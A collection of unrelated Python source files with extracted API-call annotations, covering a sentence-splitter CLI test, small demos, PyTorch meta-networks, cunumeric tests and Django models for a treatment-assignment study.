
    def _assert_split(self, process):
        # Shared outcome check: clean exit and correctly split sentences.
        self.assertEqual(0, process.returncode)
        self.assertEqual(self._EXPECTED, process.stdout)

    def test_simple_invocation(self):
        """Test simple execution: read from stdin, write to stdout"""
        process = subprocess.run(
            ['python3', '-m', 'hasami.cli'],
            **COMMON_SUBPROCESS_ARGS,
            input=self._INPUT,
        )
        self._assert_split(process)

    def test_reading_from_file(self):
        """Test reading input from file"""
        with tempfile.NamedTemporaryFile() as source:
            source.write(self._INPUT.encode('utf-8'))
            source.flush()
            process = subprocess.run(
                ['python3', '-m', 'hasami.cli', source.name],
                **COMMON_SUBPROCESS_ARGS,
            )
        self._assert_split(process)
| [
"subprocess.run",
"tempfile.NamedTemporaryFile"
] | [((340, 473), 'subprocess.run', 'subprocess.run', (["['python3', '-m', 'hasami.cli']"], {'input': '"""これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。"""'}), '([\'python3\', \'-m\', \'hasami.cli\'], **COMMON_SUBPROCESS_ARGS,\n input="""これは単純な文です。\nこれが最初の文です。これは二番目の文です。これが最後の文です。""")\n', (354, 473), False, 'import subprocess\n'), ((752, 781), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {}), '()\n', (779, 781), False, 'import tempfile\n'), ((925, 1014), 'subprocess.run', 'subprocess.run', (["['python3', '-m', 'hasami.cli', file.name]"], {}), "(['python3', '-m', 'hasami.cli', file.name], **\n COMMON_SUBPROCESS_ARGS)\n", (939, 1014), False, 'import subprocess\n')] |
import random
from vindinium.bots import RawBot
__all__ = ['RandomBot']
class RandomBot(RawBot):
'''Random bot.'''
def move(self):
return random.choice(['Stay', 'North', 'West', 'East', 'South']) | [
"random.choice"
] | [((161, 218), 'random.choice', 'random.choice', (["['Stay', 'North', 'West', 'East', 'South']"], {}), "(['Stay', 'North', 'West', 'East', 'South'])\n", (174, 218), False, 'import random\n')] |
import numpy as np
import pandas as pd
# Source data as a plain Python list.
array = [1,3,4,7,8,10,15]
# Wrap the list in a NumPy ndarray.
np_array = np.array(array)
print("Arranjo NumPy")
print(np_array)
print("Convertendo para serie Pandas")
# Build a pandas Series backed by the NumPy array.
ds_array = pd.Series(np_array)
print("Serie Pandas")
print(ds_array) | [
"pandas.Series",
"numpy.array"
] | [((78, 93), 'numpy.array', 'np.array', (['array'], {}), '(array)\n', (86, 93), True, 'import numpy as np\n'), ((186, 205), 'pandas.Series', 'pd.Series', (['np_array'], {}), '(np_array)\n', (195, 205), True, 'import pandas as pd\n')] |
from rich.console import Console
from rich.table import Table
def print_table(gss: tuple, fib: tuple) -> None:
console = Console()
table = Table(title='Find Function Extremum')
table.add_column('Method name', justify='right', style='cyan', no_wrap=True)
table.add_column('function in Xm value', style='magenta')
table.add_column('Xm dot value', style='red')
table.add_column('Counted iterations number', style='green')
table.add_row('Golden-Section Method', *list(map(str, gss)))
table.add_row('Fibonacci Method', *list(map(str, fib)))
console.print(table)
| [
"rich.console.Console",
"rich.table.Table"
] | [((127, 136), 'rich.console.Console', 'Console', ([], {}), '()\n', (134, 136), False, 'from rich.console import Console\n'), ((149, 186), 'rich.table.Table', 'Table', ([], {'title': '"""Find Function Extremum"""'}), "(title='Find Function Extremum')\n", (154, 186), False, 'from rich.table import Table\n')] |
# time_count.py
from webpie import WPApp, WPHandler
import time
class Handler(WPHandler):
def time(self, request, relpath):
return "[%d]: %s\n" % (self.App.bump_counter(), time.ctime()), "text/plain"
class App(WPApp):
def __init__(self, handler_class):
WPApp.__init__(self, handler_class)
self.Counter = 0
def bump_counter(self):
self.Counter += 1
return self.Counter
App(Handler).run_server(8080)
| [
"time.ctime",
"webpie.WPApp.__init__"
] | [((343, 378), 'webpie.WPApp.__init__', 'WPApp.__init__', (['self', 'handler_class'], {}), '(self, handler_class)\n', (357, 378), False, 'from webpie import WPApp, WPHandler\n'), ((248, 260), 'time.ctime', 'time.ctime', ([], {}), '()\n', (258, 260), False, 'import time\n')] |
from warehouse_item import warehouse_item
import csv
import datetime
log_file_path = "YOUR_FILE_PATH_HERE"
storage_file_path = "YOUR_FILE_PATH_HERE"
def reg_new_item(name, description, qr_code_id):
date_registered = ""
time_registered = ""
if item_already_exists(qr_code_id):
print("Can't register new item. Item with QR code already exist.", qr_code_id)
else:
item = warehouse_item(name, description, datetime.date.today(), datetime.datetime.now(), qr_code_id)
csv_row = item.attributes_to_csv()
with open(storage_file_path, mode='a') as storage_file:
storage_writer = csv.writer(storage_file, delimiter=";", quotechar="'", quoting=csv.QUOTE_MINIMAL)
storage_writer.writerow([csv_row])
def item_already_exists(scanned_qr_code):
with open(storage_file_path, mode='r') as warehouse_file:
csv_reader = csv.reader(warehouse_file, delimiter=',')
line_count = 0
for row in csv_reader:
# print(row)
if str(scanned_qr_code) == row[4]:
line_count += 1
# print("Found duplicate QR ID")
return True
else:
line_count += 1
# print("Processed lines: ", line_count)
return False
def extract_item():
# Skriv til utleie_logg
pass
def return_item():
pass
| [
"datetime.datetime.now",
"datetime.date.today",
"csv.writer",
"csv.reader"
] | [((893, 934), 'csv.reader', 'csv.reader', (['warehouse_file'], {'delimiter': '""","""'}), "(warehouse_file, delimiter=',')\n", (903, 934), False, 'import csv\n'), ((440, 461), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (459, 461), False, 'import datetime\n'), ((463, 486), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (484, 486), False, 'import datetime\n'), ((637, 723), 'csv.writer', 'csv.writer', (['storage_file'], {'delimiter': '""";"""', 'quotechar': '"""\'"""', 'quoting': 'csv.QUOTE_MINIMAL'}), '(storage_file, delimiter=\';\', quotechar="\'", quoting=csv.\n QUOTE_MINIMAL)\n', (647, 723), False, 'import csv\n')] |
import math
import time
last = 10000
found = 1 # because we skip 2, the only even prime number
start = time.monotonic()
print('Prime numbers to {}'.format(last))
# print('2',end='')
def check(number):
prime = 1
f = 1.5
g = int(math.sqrt(number))+1
for divider in range(2, g):
f = number/divider
if f == int(f):
prime = 0
return(prime)
for number in range(3, last, 2):
if check(number) == 1:
# print(',', number,end='')
found += 1
end = time.monotonic()
print('Found {:} prime numbers'.format(found))
print('This took:', (end - start), 'seconds.')
| [
"time.monotonic",
"math.sqrt"
] | [((106, 122), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (120, 122), False, 'import time\n'), ((510, 526), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (524, 526), False, 'import time\n'), ((243, 260), 'math.sqrt', 'math.sqrt', (['number'], {}), '(number)\n', (252, 260), False, 'import math\n')] |
"""
Some meta networks
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from utils.quantize import Function_STE, Function_BWN
from utils.miscellaneous import progress_bar
from utils.quantize import quantized_CNN, quantized_Linear
import utils.global_var as gVar
meta_count = 0
class MetaLSTMFC(nn.Module):
def __init__(self, hidden_size = 20):
super(MetaLSTMFC, self).__init__()
self.hidden_size = hidden_size
self.lstm1 = nn.LSTM(input_size=1, hidden_size = hidden_size, num_layers=1)
self.fc1 = nn.Linear(in_features=hidden_size, out_features=1)
def forward(self, x, hidden = None):
if hidden is None:
x, (hn1, cn1) = self.lstm1(x)
else:
x, (hn1, cn1) = self.lstm1(x, (hidden[0], hidden[1]))
x = self.fc1(x.view(-1, self.hidden_size))
return x, (hn1, cn1)
class MetaMultiLSTMFC(nn.Module):
def __init__(self, hidden_size=20, num_lstm=2):
super(MetaMultiLSTMFC, self).__init__()
self.hidden_size = hidden_size
self.lstm1 = nn.LSTM(input_size=1, hidden_size=hidden_size, num_layers=num_lstm)
self.fc1 = nn.Linear(in_features=hidden_size, out_features=1)
def forward(self, x, hidden=None):
if hidden is None:
x, (hn1, cn1) = self.lstm1(x)
else:
x, (hn1, cn1) = self.lstm1(x, (hidden[0], hidden[1]))
x = self.fc1(x.view(-1, self.hidden_size))
return x, (hn1, cn1)
class MetaFC(nn.Module):
def __init__(self, hidden_size = 1500, symmetric_init=False, use_nonlinear=None):
super(MetaFC, self).__init__()
self.linear1 = nn.Linear(in_features=1, out_features=hidden_size, bias=False)
self.linear2 = nn.Linear(in_features=hidden_size, out_features=1, bias=False)
if symmetric_init:
self.linear1.weight.data.fill_(1.0 / hidden_size)
self.linear2.weight.data.fill_(1.0)
self.use_nonlinear = use_nonlinear
def forward(self, x):
x = self.linear1(x)
if self.use_nonlinear is 'relu':
x = F.relu(x)
elif self.use_nonlinear is 'tanh':
x = torch.tanh(x)
x = self.linear2(x)
return x
class MetaMultiFC(nn.Module):
def __init__(self, hidden_size = 10, use_nonlinear=None):
super(MetaMultiFC, self).__init__()
self.linear1 = nn.Linear(in_features=1, out_features=hidden_size, bias=False)
self.linear2 = nn.Linear(in_features=hidden_size, out_features=hidden_size, bias=False)
self.linear3 = nn.Linear(in_features=hidden_size, out_features=1, bias=False)
self.use_nonlinear = use_nonlinear
def forward(self, x):
x = self.linear1(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear2(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear3(x)
return x
class MetaDesignedMultiFC(nn.Module):
def __init__(self, hidden_size = 10, num_layers = 4, use_nonlinear='relu'):
super(MetaDesignedMultiFC, self).__init__()
self.use_nonlinear = use_nonlinear
self.network = nn.Sequential()
# self.linear = dict()
for layer_idx in range(num_layers):
in_features = 1 if layer_idx == 0 else hidden_size
out_features = 1 if layer_idx == (num_layers-1) else hidden_size
self.network.add_module('Linear%d' %layer_idx, nn.Linear(in_features=in_features, out_features=out_features, bias=False))
if layer_idx != (num_layers-1):
if self.use_nonlinear == 'relu':
self.network.add_module('ReLU%d' %layer_idx, nn.ReLU())
elif self.use_nonlinear == 'tanh':
self.network.add_module('Tanh%d' %layer_idx, nn.Tanh())
else:
# raise NotImplementedError
pass
def forward(self, x):
return self.network(x)
class MetaMultiFCBN(nn.Module):
def __init__(self, hidden_size = 10, use_nonlinear = None):
super(MetaMultiFCBN, self).__init__()
self.linear1 = nn.Linear(in_features=1, out_features=hidden_size, bias=False)
self.linear2 = nn.Linear(in_features=hidden_size, out_features=hidden_size, bias=False)
self.linear3 = nn.Linear(in_features=hidden_size, out_features=1, bias=False)
self.bn1 = nn.BatchNorm1d(num_features=hidden_size)
self.bn2 = nn.BatchNorm1d(num_features=hidden_size)
self.use_nonlinear = use_nonlinear
def forward(self, x):
x = self.linear1(x)
x = self.bn1(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear2(x)
x = self.bn2(x)
if self.use_nonlinear == 'relu':
x = F.relu(x)
elif self.use_nonlinear == 'tanh':
x = torch.tanh(x)
x = self.linear3(x)
return x
class MetaSimple(nn.Module):
"""
A simple Meta model just multiplies a factor to the input gradient
"""
def __init__(self):
super(MetaSimple, self).__init__()
self.alpha = nn.Parameter(torch.ones([1]))
def forward(self, x):
return self.alpha * x
def update_parameters(net, lr):
for param in net.parameters():
param.data.add_(-lr * param.grad.data)
def test(net, quantized_type, test_loader, use_cuda = True):
net.eval()
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(test_loader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
outputs = net(inputs, quantized_type)
_, predicted = torch.max(outputs.data, dim=1)
correct += predicted.eq(targets.data).cpu().sum().item()
total += targets.size(0)
progress_bar(batch_idx, len(test_loader), "Test Acc: %.3f%%" % (100.0 * correct / total))
return 100.0 * correct / total
if __name__ == '__main__':
net = MetaDesignedMultiFC()
torch.save(
{
'model': net,
'hidden_size': 100,
'nonlinear': 'None'
}, './Results/meta_net.pkl'
)
meta_pack = torch.load('./Results/meta_net.pkl')
retrieve_net = meta_pack['model']
inputs = torch.rand([10, 1])
outputs = retrieve_net(inputs)
| [
"torch.tanh",
"torch.nn.ReLU",
"torch.nn.Tanh",
"torch.nn.LSTM",
"torch.nn.Sequential",
"torch.load",
"torch.max",
"torch.nn.BatchNorm1d",
"torch.save",
"torch.nn.Linear",
"torch.nn.functional.relu",
"torch.rand",
"torch.ones"
] | [((6281, 6378), 'torch.save', 'torch.save', (["{'model': net, 'hidden_size': 100, 'nonlinear': 'None'}", '"""./Results/meta_net.pkl"""'], {}), "({'model': net, 'hidden_size': 100, 'nonlinear': 'None'},\n './Results/meta_net.pkl')\n", (6291, 6378), False, 'import torch\n'), ((6452, 6488), 'torch.load', 'torch.load', (['"""./Results/meta_net.pkl"""'], {}), "('./Results/meta_net.pkl')\n", (6462, 6488), False, 'import torch\n'), ((6541, 6560), 'torch.rand', 'torch.rand', (['[10, 1]'], {}), '([10, 1])\n', (6551, 6560), False, 'import torch\n'), ((492, 552), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': '(1)', 'hidden_size': 'hidden_size', 'num_layers': '(1)'}), '(input_size=1, hidden_size=hidden_size, num_layers=1)\n', (499, 552), True, 'import torch.nn as nn\n'), ((574, 624), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)'}), '(in_features=hidden_size, out_features=1)\n', (583, 624), True, 'import torch.nn as nn\n'), ((1098, 1165), 'torch.nn.LSTM', 'nn.LSTM', ([], {'input_size': '(1)', 'hidden_size': 'hidden_size', 'num_layers': 'num_lstm'}), '(input_size=1, hidden_size=hidden_size, num_layers=num_lstm)\n', (1105, 1165), True, 'import torch.nn as nn\n'), ((1185, 1235), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)'}), '(in_features=hidden_size, out_features=1)\n', (1194, 1235), True, 'import torch.nn as nn\n'), ((1685, 1747), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': '(1)', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=1, out_features=hidden_size, bias=False)\n', (1694, 1747), True, 'import torch.nn as nn\n'), ((1771, 1833), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)', 'bias': '(False)'}), '(in_features=hidden_size, out_features=1, bias=False)\n', (1780, 1833), True, 'import torch.nn as nn\n'), ((2421, 2483), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': '(1)', 'out_features': 'hidden_size', 
'bias': '(False)'}), '(in_features=1, out_features=hidden_size, bias=False)\n', (2430, 2483), True, 'import torch.nn as nn\n'), ((2507, 2579), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=hidden_size, out_features=hidden_size, bias=False)\n', (2516, 2579), True, 'import torch.nn as nn\n'), ((2603, 2665), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)', 'bias': '(False)'}), '(in_features=hidden_size, out_features=1, bias=False)\n', (2612, 2665), True, 'import torch.nn as nn\n'), ((3360, 3375), 'torch.nn.Sequential', 'nn.Sequential', ([], {}), '()\n', (3373, 3375), True, 'import torch.nn as nn\n'), ((4347, 4409), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': '(1)', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=1, out_features=hidden_size, bias=False)\n', (4356, 4409), True, 'import torch.nn as nn\n'), ((4433, 4505), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': 'hidden_size', 'bias': '(False)'}), '(in_features=hidden_size, out_features=hidden_size, bias=False)\n', (4442, 4505), True, 'import torch.nn as nn\n'), ((4529, 4591), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'hidden_size', 'out_features': '(1)', 'bias': '(False)'}), '(in_features=hidden_size, out_features=1, bias=False)\n', (4538, 4591), True, 'import torch.nn as nn\n'), ((4612, 4652), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ([], {'num_features': 'hidden_size'}), '(num_features=hidden_size)\n', (4626, 4652), True, 'import torch.nn as nn\n'), ((4672, 4712), 'torch.nn.BatchNorm1d', 'nn.BatchNorm1d', ([], {'num_features': 'hidden_size'}), '(num_features=hidden_size)\n', (4686, 4712), True, 'import torch.nn as nn\n'), ((5951, 5981), 'torch.max', 'torch.max', (['outputs.data'], {'dim': '(1)'}), '(outputs.data, dim=1)\n', (5960, 5981), False, 'import torch\n'), ((2129, 2138), 'torch.nn.functional.relu', 
'F.relu', (['x'], {}), '(x)\n', (2135, 2138), True, 'import torch.nn.functional as F\n'), ((2823, 2832), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (2829, 2832), True, 'import torch.nn.functional as F\n'), ((2991, 3000), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (2997, 3000), True, 'import torch.nn.functional as F\n'), ((4894, 4903), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (4900, 4903), True, 'import torch.nn.functional as F\n'), ((5086, 5095), 'torch.nn.functional.relu', 'F.relu', (['x'], {}), '(x)\n', (5092, 5095), True, 'import torch.nn.functional as F\n'), ((5435, 5450), 'torch.ones', 'torch.ones', (['[1]'], {}), '([1])\n', (5445, 5450), False, 'import torch\n'), ((2198, 2211), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (2208, 2211), False, 'import torch\n'), ((2892, 2905), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (2902, 2905), False, 'import torch\n'), ((3060, 3073), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (3070, 3073), False, 'import torch\n'), ((3652, 3725), 'torch.nn.Linear', 'nn.Linear', ([], {'in_features': 'in_features', 'out_features': 'out_features', 'bias': '(False)'}), '(in_features=in_features, out_features=out_features, bias=False)\n', (3661, 3725), True, 'import torch.nn as nn\n'), ((4963, 4976), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (4973, 4976), False, 'import torch\n'), ((5155, 5168), 'torch.tanh', 'torch.tanh', (['x'], {}), '(x)\n', (5165, 5168), False, 'import torch\n'), ((3886, 3895), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (3893, 3895), True, 'import torch.nn as nn\n'), ((4013, 4022), 'torch.nn.Tanh', 'nn.Tanh', ([], {}), '()\n', (4020, 4022), True, 'import torch.nn as nn\n')] |
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
import numpy as np
import pytest
import cunumeric as cn
from legate.core import LEGATE_MAX_DIM
@pytest.mark.parametrize("ndim", range(0, LEGATE_MAX_DIM))
def test_indices(ndim):
dimensions = tuple(random.randint(2, 5) for i in range(ndim))
np_res = np.indices(dimensions)
cn_res = cn.indices(dimensions)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, dtype=float)
cn_res = cn.indices(dimensions, dtype=float)
assert np.array_equal(np_res, cn_res)
np_res = np.indices(dimensions, sparse=True)
cn_res = cn.indices(dimensions, sparse=True)
for i in range(len(np_res)):
assert np.array_equal(np_res[i], cn_res[i])
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
| [
"cunumeric.indices",
"numpy.indices",
"pytest.main",
"numpy.array_equal",
"random.randint"
] | [((861, 883), 'numpy.indices', 'np.indices', (['dimensions'], {}), '(dimensions)\n', (871, 883), True, 'import numpy as np\n'), ((897, 919), 'cunumeric.indices', 'cn.indices', (['dimensions'], {}), '(dimensions)\n', (907, 919), True, 'import cunumeric as cn\n'), ((931, 961), 'numpy.array_equal', 'np.array_equal', (['np_res', 'cn_res'], {}), '(np_res, cn_res)\n', (945, 961), True, 'import numpy as np\n'), ((976, 1011), 'numpy.indices', 'np.indices', (['dimensions'], {'dtype': 'float'}), '(dimensions, dtype=float)\n', (986, 1011), True, 'import numpy as np\n'), ((1025, 1060), 'cunumeric.indices', 'cn.indices', (['dimensions'], {'dtype': 'float'}), '(dimensions, dtype=float)\n', (1035, 1060), True, 'import cunumeric as cn\n'), ((1072, 1102), 'numpy.array_equal', 'np.array_equal', (['np_res', 'cn_res'], {}), '(np_res, cn_res)\n', (1086, 1102), True, 'import numpy as np\n'), ((1117, 1152), 'numpy.indices', 'np.indices', (['dimensions'], {'sparse': '(True)'}), '(dimensions, sparse=True)\n', (1127, 1152), True, 'import numpy as np\n'), ((1166, 1201), 'cunumeric.indices', 'cn.indices', (['dimensions'], {'sparse': '(True)'}), '(dimensions, sparse=True)\n', (1176, 1201), True, 'import cunumeric as cn\n'), ((1250, 1286), 'numpy.array_equal', 'np.array_equal', (['np_res[i]', 'cn_res[i]'], {}), '(np_res[i], cn_res[i])\n', (1264, 1286), True, 'import numpy as np\n'), ((1345, 1366), 'pytest.main', 'pytest.main', (['sys.argv'], {}), '(sys.argv)\n', (1356, 1366), False, 'import pytest\n'), ((804, 824), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (818, 824), False, 'import random\n')] |
from django.db import models
from django.conf import settings
from django.utils.translation import gettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.db.models.signals import post_save
from django.urls import reverse
from config.utils import notify_slack
from random import random
class ActiveManager(models.Manager):
def get_queryset(self):
return super().get_queryset().filter(is_active=True)
class Treatment(models.Model):
name = models.SlugField(unique=True)
label = models.CharField(max_length=50)
is_active = models.BooleanField(default=True)
target_assignment_ratio = models.FloatField(default=0)
objects = models.Manager()
active_treatments = ActiveManager()
def __str__(self):
return self.label
class Meta:
ordering = ('name',)
class Assignment(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
group = models.CharField(max_length=10, blank=True, null=True)
treatment = models.ForeignKey(Treatment, on_delete=models.CASCADE)
assigned_date = models.DateTimeField(auto_now_add=True)
GROUPS = ('autonomy', 'control', )
NUM_GROUPS = len(GROUPS)
__treatment_id = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__treatment_id = self.treatment_id
def __str__(self):
return '%s - %s/%s' % (self.user, self.treatment.name, self.group)
def save(self, *args, **kwargs):
if self.treatment_id != self.__treatment_id:
# Force creation of new item
self.pk = None
super().save(*args, **kwargs)
def notify_assignment(sender, instance, created, **kwargs):
from .treatments import assignment_stats
if not created:
return
content_type = ContentType.objects.get_for_model(instance.__class__)
url = reverse("admin:%s_%s_change" % (content_type.app_label, content_type.model), args=(instance.pk,))
stats = assignment_stats()
stats_text = ', '.join(['%s/%s N=%d (%d%%)' % (s['name'], s['assignment__group'], s['count'], 100*s['ratio']) for s in stats if s['count'] > 0])
notify_slack('*New assignment!* %s \n Stats: %s \n' % (instance, stats_text), url)
post_save.connect(notify_assignment, sender=Assignment)
class ClassificationResult(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
completed_date = models.DateField(auto_now_add=True)
score_autonomy = models.IntegerField()
score_impersonal = models.IntegerField()
score_control = models.IntegerField()
score_amotivation = models.IntegerField()
calculated_group = models.CharField(max_length=10, blank=True, null=True)
age = models.CharField(max_length=10)
sex = models.CharField(max_length=10)
occupation = models.CharField(max_length=10)
class Meta:
ordering = ('-id',)
def calculate_group(self):
"Calculate group based on Inference Tree computed from Mturk data"
prob_autonomy = 0
if self.score_amotivation <= 3: # 2 on 5-scale likert -> 3 on 7-scale likert
if self.score_impersonal <= 3:
if self.score_control <= 2:
prob_autonomy = 1.0 # Autonomy with 0% error
else:
if self.score_autonomy <= 5:
prob_autonomy = 0.5 # Control with 50% error
else:
prob_autonomy = 0.9 # Autonomy with 10% error
else:
prob_autonomy = 0.41 # Control with 41% error
else:
prob_autonomy = 0.09 # Control with 9% error
if random() < prob_autonomy:
return 'autonomy'
return 'control'
def save(self, *args, **kwargs):
# Calculate group
if not self.calculated_group:
self.calculated_group = self.calculate_group()
super().save(*args, **kwargs)
class GcosResult(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
completed_date = models.DateField(auto_now_add=True)
score_autonomy = models.IntegerField()
score_control = models.IntegerField()
score_impersonal = models.IntegerField()
score_order = models.CharField(max_length=3)
@property
def scores(self):
return {
'A': self.score_autonomy,
'C': self.score_control,
'I': self.score_impersonal
}
def _calculate_score_order(self):
scores_sorted = sorted(self.scores.items(), key=lambda item: item[1])[::-1]
return ''.join([item[0] for item in test_scores_sorted])
def save(self, *args, **kwargs):
self.score_order = self._calculate_score_order()
super().save(*args, **kwargs)
def __str__(self):
return 'A %d, C %d, I %d' % (self.score_autonomy, self.score_control, self.score_impersonal) | [
"django.db.models.FloatField",
"django.db.models.Manager",
"django.contrib.contenttypes.models.ContentType.objects.get_for_model",
"django.db.models.DateField",
"django.db.models.ForeignKey",
"django.db.models.IntegerField",
"django.db.models.signals.post_save.connect",
"config.utils.notify_slack",
... | [((2269, 2324), 'django.db.models.signals.post_save.connect', 'post_save.connect', (['notify_assignment'], {'sender': 'Assignment'}), '(notify_assignment, sender=Assignment)\n', (2286, 2324), False, 'from django.db.models.signals import post_save\n'), ((491, 520), 'django.db.models.SlugField', 'models.SlugField', ([], {'unique': '(True)'}), '(unique=True)\n', (507, 520), False, 'from django.db import models\n'), ((533, 564), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (549, 564), False, 'from django.db import models\n'), ((581, 614), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (600, 614), False, 'from django.db import models\n'), ((645, 673), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0)'}), '(default=0)\n', (662, 673), False, 'from django.db import models\n'), ((689, 705), 'django.db.models.Manager', 'models.Manager', ([], {}), '()\n', (703, 705), False, 'from django.db import models\n'), ((887, 956), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE'}), '(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n', (904, 956), False, 'from django.db import models\n'), ((969, 1023), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)', 'blank': '(True)', 'null': '(True)'}), '(max_length=10, blank=True, null=True)\n', (985, 1023), False, 'from django.db import models\n'), ((1040, 1094), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Treatment'], {'on_delete': 'models.CASCADE'}), '(Treatment, on_delete=models.CASCADE)\n', (1057, 1094), False, 'from django.db import models\n'), ((1115, 1154), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (1135, 1154), False, 'from django.db import models\n'), ((1840, 1893), 
'django.contrib.contenttypes.models.ContentType.objects.get_for_model', 'ContentType.objects.get_for_model', (['instance.__class__'], {}), '(instance.__class__)\n', (1873, 1893), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((1904, 2005), 'django.urls.reverse', 'reverse', (["('admin:%s_%s_change' % (content_type.app_label, content_type.model))"], {'args': '(instance.pk,)'}), "('admin:%s_%s_change' % (content_type.app_label, content_type.model),\n args=(instance.pk,))\n", (1911, 2005), False, 'from django.urls import reverse\n'), ((2186, 2274), 'config.utils.notify_slack', 'notify_slack', (['("""*New assignment!* %s \n Stats: %s \n""" % (instance, stats_text))', 'url'], {}), '("""*New assignment!* %s \n Stats: %s \n""" % (instance,\n stats_text), url)\n', (2198, 2274), False, 'from config.utils import notify_slack\n'), ((2379, 2448), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE'}), '(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n', (2396, 2448), False, 'from django.db import models\n'), ((2470, 2505), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (2486, 2505), False, 'from django.db import models\n'), ((2527, 2548), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2546, 2548), False, 'from django.db import models\n'), ((2572, 2593), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2591, 2593), False, 'from django.db import models\n'), ((2614, 2635), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2633, 2635), False, 'from django.db import models\n'), ((2660, 2681), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (2679, 2681), False, 'from django.db import models\n'), ((2705, 2759), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)', 'blank': '(True)', 'null': '(True)'}), 
'(max_length=10, blank=True, null=True)\n', (2721, 2759), False, 'from django.db import models\n'), ((2771, 2802), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (2787, 2802), False, 'from django.db import models\n'), ((2813, 2844), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (2829, 2844), False, 'from django.db import models\n'), ((2862, 2893), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(10)'}), '(max_length=10)\n', (2878, 2893), False, 'from django.db import models\n'), ((4038, 4107), 'django.db.models.ForeignKey', 'models.ForeignKey', (['settings.AUTH_USER_MODEL'], {'on_delete': 'models.CASCADE'}), '(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n', (4055, 4107), False, 'from django.db import models\n'), ((4129, 4164), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (4145, 4164), False, 'from django.db import models\n'), ((4186, 4207), 'django.db.models.IntegerField', 